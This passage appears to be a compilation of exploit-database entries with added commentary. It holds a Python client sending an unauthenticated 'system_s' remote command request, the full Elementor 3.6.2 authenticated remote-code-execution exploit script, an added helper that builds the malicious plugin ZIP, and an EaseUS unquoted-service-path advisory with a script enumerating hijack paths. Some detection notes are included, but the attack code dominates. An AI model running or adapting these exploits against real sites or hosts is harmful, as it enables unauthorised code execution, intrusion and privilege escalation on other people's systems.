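    if b == 0xDC:
        n = struct.unpack(">H", data[pos:pos + 2])[0]
        return _unpack_array(data, pos + 2, n)
    raise ValueError(f"unsupported MessagePack type byte 0x{b:02x}")


def _unpack_array(data, pos, n):
    items = []
    for _ in range(n):
        item, pos = unpack(data, pos)
        items.append(item)
    return items, pos


def rpc_request(msgid, method, params):
    """msgpack-rpc request frame: [0, msgid, method, params]."""
    return pack([0, msgid, method, list(params)])


def parse_rpc_response(data):
    """msgpack-rpc response frame: [1, msgid, error, result]."""
    frame, _ = unpack(data)
    if not (isinstance(frame, list) and len(frame) == 4 and frame[0] == 1):
        raise ValueError("not a msgpack-rpc response")
    return {"msgid": frame[1], "error": frame[2], "result": frame[3]}


def call_system_s(host, port, program, args, timeout=5):
    """Send one system_s request over a raw TCP socket and parse whatever comes back.
    Not exercised offline; for a lab host only."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(rpc_request(1, "system_s", [program, args]))
        buf = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
    return parse_rpc_response(buf)


if __name__ == "__main__":
    print(rpc_request(1, "system_s", ["powershell", "whoami"]).hex(" "))
```

On the wire the request for `powershell whoami` is `94 00 01 a8 "system_s" 92 aa "powershell" a6 "whoami"`; the byte sequence `\xa8system_s` directly after a request header is a usable content match for a network signature on port 12345, and the absence of any credential or token in the frame is the access-control defect the advisory describes.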
-
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.6.2
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)

#!/usr/bin/python
import re
import sys
import requests

# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.

# # # # # VULNERABILITY DESCRIPTION # # # # #
#
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
#   add_action( 'admin_init', function() {
#       if ( wp_doing_ajax() &&
#           isset( $_POST['action'] ) &&
#           isset( $_POST['_nonce'] ) &&
#           wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
#       ) {
#           $this->maybe_handle_ajax();
#       }
#   } );
#
# This code is triggered whenever ANY user account visits /wp-admin; there is no capability check.
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in the DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php". This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
# 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
#    e.g.
#    <?php
#    /**
#     * Plugin Name: Elementor Pro
#     */
#    // Actual PHP payload
#    ?>
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
#   if (!isset($_GET['activate']))
#       return;

# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip'           # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/'    # Change this with the base url of the target
username = 'guest'                               # Change this with the username you want to use to log in
password = 'test'                                # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' }  # WordPress needs this to tell if browser can manage cookies


def DoLogin(username, password):
    global cookies
    loginUrl = baseUrl + 'wp-login.php'
    adminUrl = baseUrl + 'wp-admin/'
    data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
    # search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
    # 4e8878bdba is just an example of nonce. It can be anything else.
    regexp = re.compile('"ajax":\\{"url":".+?admin\\-ajax\\.php","nonce":"(.+?)"\\}')
    response = session.post(loginUrl, cookies=cookies, data=data)
    search = regexp.search(response.text)
    if not search:
        # I've tested this on WordPress v. 5.9.3
        # Fix the regexp if needed.
        print('Error - Invalid credentials?')
        #print(response.text)
        return None
    return search.group(1)


def UploadFile(fileName, nonce):
    uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
    data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
    regexp = re.compile('"elementorProInstalled":true')  # search for: "elementorProInstalled":true
    with open(fileName, 'rb') as archive:
        files = { 'fileToUpload' : archive }
        response = session.post(uploadUrl, data=data, files=files)
    search = regexp.search(response.text)
    if not search:
        # If Elementor Pro is already installed, the upload will fail.
        # You can print the response to investigate further
        print ('Error - Upload failed')
        # print (response.text)
        return False
    else:
        print ('Upload completed successfully!')
        return True


# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
    payloadUrl = baseUrl + 'index.php?activate=1'
    session.get(payloadUrl)


print('Trying to login...')
nonce = DoLogin(username, password)
if nonce is None:
    sys.exit(1)
print('Nonce found: ' + nonce)

print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)

# Define YOUR method to activate your payload (if needed)
if fileUploaded:
    print ('Activating payload...')
    ActivatePayload()
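Added example, not part of AkuCyberSec's exploit: a Python helper that builds the archive the description above specifies (a ZIP with `elementor-pro/elementor-pro.php`, a `Plugin Name:` header, and the `?activate=1` gate the author recommends) and a checker that verifies those requirements before anything is uploaded, since the upload fails silently otherwise. The PHP body passed in is a placeholder supplied by the caller; the plugin name and the gate are taken from the text, everything else is this example's own.

```python
import io
import re
import zipfile

REQUIRED_DIR = "elementor-pro/"
REQUIRED_MEMBER = REQUIRED_DIR + "elementor-pro.php"
# WordPress reads the plugin name from a "Plugin Name:" header line in the main file
HEADER_RE = re.compile(r"^\s*\*?\s*Plugin Name:[ \t]*(\S.*?)\s*$", re.MULTILINE)


def build_plugin_zip(php_body, plugin_name="Elementor Pro"):
    """Return the bytes of a ZIP laid out as the description requires. php_body is the
    caller's code and runs only when the request carries ?activate=1, per the text above."""
    main_file = (
        "<?php\n"
        "/**\n"
        f" * Plugin Name: {plugin_name}\n"
        " */\n"
        "if (!isset($_GET['activate']))\n"    # the gate suggested above
        "    return;\n"
        f"{php_body}\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(REQUIRED_MEMBER, main_file)
    return buf.getvalue()


def check_plugin_zip(data):
    """Verify the four structural requirements; return (ok, reason)."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return False, "not a ZIP archive"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if REQUIRED_MEMBER not in names:
            return False, f"missing {REQUIRED_MEMBER}"
        if any(not n.startswith(REQUIRED_DIR) for n in names):
            return False, f"entries outside {REQUIRED_DIR}"
        source = zf.read(REQUIRED_MEMBER).decode("utf-8", "replace")
        match = HEADER_RE.search(source)
        if not match:
            return False, "no 'Plugin Name:' header in elementor-pro.php"
        return True, f"ok: plugin header '{match.group(1)}'"


if __name__ == "__main__":
    # placeholder body for demonstration only
    archive = build_plugin_zip("echo 'placeholder';")
    print(check_plugin_zip(archive))
    with open("elementor-pro.zip", "wb") as fh:
        fh.write(archive)
```

The same `check_plugin_zip` logic, pointed at the `elementor-pro` directory of a live site, is a quick way to tell a real Elementor Pro install from a planted one: the genuine plugin ships many files, while a fake one built this way contains a single main file.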
-
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-04-18
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE    EaseUS UPDATE SERVICE    C:\Program Files (x86)\EaseUS\ENS\ensserver.exe    Auto

C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo
Host Name:                 DESKTOP-HR3T34O
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19042 N/A Build 19042
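Added example, not part of the advisory: a Python helper that parses `sc qc` output like the block above and enumerates the file names Windows would try before the real binary when a service path is unquoted and contains spaces. CreateProcess splits such a path at every space and appends `.exe` to each prefix that has no extension, so the EaseUS path yields `C:\Program.exe` and `C:\Program Files.exe`. The `sc qc` sample is the advisory's own output, re-embedded as a constant; the quoted and space-free service paths in the test are constructed counter-examples.

```python
import re

# the `sc qc` output from the advisory above, embedded as a sample
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]{2,})\s*:\s*(.*?)\s*$")
EXE_RE = re.compile(r"^(.*?\.exe)(?:\s|$)", re.IGNORECASE)


def parse_sc_qc(text):
    """Turn `sc qc` output into {FIELD: value}; lines that are not FIELD : value are ignored."""
    fields = {}
    for line in text.splitlines():
        match = FIELD_RE.match(line)
        if match:
            fields[match.group(1)] = match.group(2)
    return fields


def executable_part(binary_path):
    """The image path without any trailing arguments (everything up to the first .exe)."""
    match = EXE_RE.match(binary_path.strip())
    return match.group(1) if match else binary_path.strip()


def is_unquoted_with_spaces(binary_path):
    """True when the image path is not wrapped in quotes and contains at least one space."""
    path = binary_path.strip()
    return not path.startswith('"') and " " in executable_part(path)


def hijack_candidates(binary_path):
    """File names CreateProcess tries before the real one, in order: the path is split at
    each space and '.exe' is appended when the prefix has no extension. Empty list when the
    path is quoted or has no spaces."""
    if not is_unquoted_with_spaces(binary_path):
        return []
    exe = executable_part(binary_path)
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            last_component = prefix.rsplit("\\", 1)[-1]
            candidates.append(prefix if "." in last_component else prefix + ".exe")
    return candidates


def assess(sc_qc_text):
    """Summarise one service: its image path, account and the planting locations to check."""
    fields = parse_sc_qc(sc_qc_text)
    path = fields.get("BINARY_PATH_NAME", "")
    return {
        "service": fields.get("SERVICE_NAME"),
        "runs_as": fields.get("SERVICE_START_NAME"),
        "auto_start": fields.get("START_TYPE", "").startswith("2"),
        "unquoted": is_unquoted_with_spaces(path),
        "candidates": hijack_candidates(path),
    }


if __name__ == "__main__":
    for key, value in assess(SC_QC_SAMPLE).items():
        print(f"{key:>11}: {value}")
```

The candidate list is only half of the check. Exploitation needs write access to the directory a candidate lives in (`C:\` or `C:\Program Files (x86)\` here), which a standard user does not have on a default installation, plus a way to restart the service or the machine; `icacls "C:\Program Files (x86)"` on the target answers the first question, and the advisory does not claim either condition holds.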